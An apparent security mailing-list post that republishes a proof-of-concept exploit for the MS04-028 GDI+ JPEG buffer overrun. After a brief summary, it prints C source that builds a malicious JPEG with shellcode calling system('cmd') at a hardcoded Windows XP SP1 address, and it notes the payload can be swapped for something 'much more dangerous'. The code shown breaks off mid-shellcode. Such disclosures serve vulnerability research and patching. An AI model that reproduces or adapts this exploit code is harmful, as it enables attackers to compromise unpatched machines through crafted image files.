Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - Buffer Overrun in JPEG Processing (GDI+) Exploit ------------------------------------------------------------------------ SUMMARY In a previously reported article, <http://www.securiteam.com/windowsntfocus/5VP0H1FE0W.html> Buffer Overrun in JPEG Processing (GDI+) Allows Code Execution (MS04-028), a buffer overflow vulnerability in parsing JPEG comments was reported by Microsoft. Presented below is a proof of concept exploit program that will generate a JPEG file exploiting this vulnerability. DETAILS Upon running this exploit, the program writes out an example JPEG file containing a shellcode that will launch cmd and obtain a shell on the local machine. Since the shell is not bound to the network, this exploit cannot be used to take control over a remote system. However, the code is sufficiently adaptable so that a much more dangerous payload can be used. The shellcode can be up to 2500 bytes which is considered very large. Note that in order for a target machine to be affected, the GDI+ library has to process and parse the JPEG image, either by previewing it or by directly opening it in an affected platform and product combination. Exploit // GDI+ buffer overrun exploit by FoToZ // NB: the headers here are only sample headers taken from a .JPG file, // with the FF FE 00 01 inserted in header1. // Sample shellcode is provided // You can put approx. 2500 bytes of shellcode...who needs that much anyway // Tested on an unpatched WinXP SP1 #include <direct.h> #include <stdio.h> char shellcode[]= "\x68" // push "cmd " "\x8B\xC4" // mov eax,esp "\x50" // push eax "\xB8\x44\x80\xC2\x77" // mov eax,77c28044h (address of system() on WinXP SP1) "\xFF\xD0" // call eax ;
